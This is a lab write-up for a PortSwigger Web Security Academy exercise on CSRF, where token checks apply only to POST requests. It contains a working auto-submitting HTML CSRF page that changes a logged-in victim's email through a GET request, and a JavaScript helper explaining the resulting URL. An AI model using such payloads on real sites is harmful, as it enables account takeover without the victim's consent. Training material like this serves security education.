Lab: CSRF where token validation depends on request method

tags: Portswigger Web Security Academy Web
  • Description: This lab’s email change functionality is vulnerable to CSRF. It attempts to block CSRF attacks, but only applies defenses to certain types of requests.
  • Goal: To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer’s email address. You can log in to your own account using the following credentials: wiener:peter

Recon

  1. Log in and change the email to capture the request. As in the previous lab, log in and update the email address while intercepting the change-email request in the proxy (screenshot not reproduced here). The POST body carries a `csrf_token` parameter alongside `email`.
  2. According to 从0到1完全掌握 CSRF (Mastering CSRF from 0 to 1) and a CSDN write-up:
     :::info
     Two techniques can bypass this kind of protection: 1. **Delete the `csrf_token` parameter** 2. **Change the `POST` method to `GET`**

     In this lab we use the 2nd method.
     :::
     Resend the captured request as a GET with `email` in the query string and no `csrf_token`. The response status is 302, the same redirect the legitimate change returns, so the server applied the change without checking a token. That GET request is therefore a good basis for the forged CSRF request.

Exploit - Change POST to GET to bypass CSRF

Following the hand-crafted PoC from the previous lab, the exploit payload is:

```html
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <script>history.pushState('', '', '/')</script>
 
    <!-- method="GET": the server only validates csrf_token on POST, so no token field is needed.
         For a GET form the browser discards the query string already in the action URL and
         replaces it with the form fields, so the request actually sent is
         /my-account/change-email?email=danger%40gmail.com -->
    <form action="https://0a9700ef04043a66801b0d0e00d10084.web-security-academy.net/my-account/change-email?email=bernie6401%40gmail.com" method="GET">
      <!-- Burp encodes @ and . as HTML character references; the browser decodes them before submitting -->
      <input type="hidden" name="email" value="danger&#64;gmail&#46;com" />
    </form>
    <script>
          document.forms[0].submit();
    </script>
  </body>
</html>
```
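Why the payload works even though the form's `action` already carries an `email` query parameter: for `method="GET"` the browser replaces the action URL's query string with the URL-encoded form fields (it does not append to it), after decoding the character references in the hidden input's value. The following added example (not part of the original write-up or the lab) reproduces that submission URL computation in plain JavaScript; `decodeNumericEntities` and `getFormSubmissionUrl` are helper names chosen here, not browser APIs.

```javascript
// Added example, not from the lab or the original write-up: compute the URL a
// browser requests when an HTML form with method="GET" is submitted.

// Browsers decode character references in attribute values before submission,
// so "danger&#64;gmail&#46;com" becomes "danger@gmail.com". Numeric references
// (decimal and hex) only; that is all the Burp-generated payload above uses.
function decodeNumericEntities(value) {
  return value.replace(/&#([xX][0-9a-fA-F]+|\d+);/g, (_, ref) => {
    const codePoint =
      ref[0] === "x" || ref[0] === "X" ? parseInt(ref.slice(1), 16) : parseInt(ref, 10);
    return String.fromCodePoint(codePoint);
  });
}

// Per the HTML form-submission algorithm ("mutate action URL"), a GET form sets
// the action URL's query to the urlencoded field list, discarding whatever query
// the action already had. URLSearchParams produces the same encoding a browser
// does for application/x-www-form-urlencoded (@ becomes %40, space becomes +).
function getFormSubmissionUrl(action, fields) {
  const url = new URL(action);
  url.search = new URLSearchParams(fields).toString();
  return url.toString();
}

// The form from the exploit page above, as the browser sees it.
const EXPLOIT_ACTION =
  "https://0a9700ef04043a66801b0d0e00d10084.web-security-academy.net/my-account/change-email?email=bernie6401%40gmail.com";
const EXPLOIT_FIELDS = { email: decodeNumericEntities("danger&#64;gmail&#46;com") };

// The request the victim's browser actually issues (with their session cookie).
function exploitRequestUrl() {
  return getFormSubmissionUrl(EXPLOIT_ACTION, EXPLOIT_FIELDS);
}
```

The query string left in the `action` by Burp's generator is therefore harmless but also pointless; either drop it or drop the hidden input, and keep only one source of the `email` value so the payload reads the way it behaves.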


Reference

从0到1完全掌握 CSRF (Mastering CSRF from 0 to 1)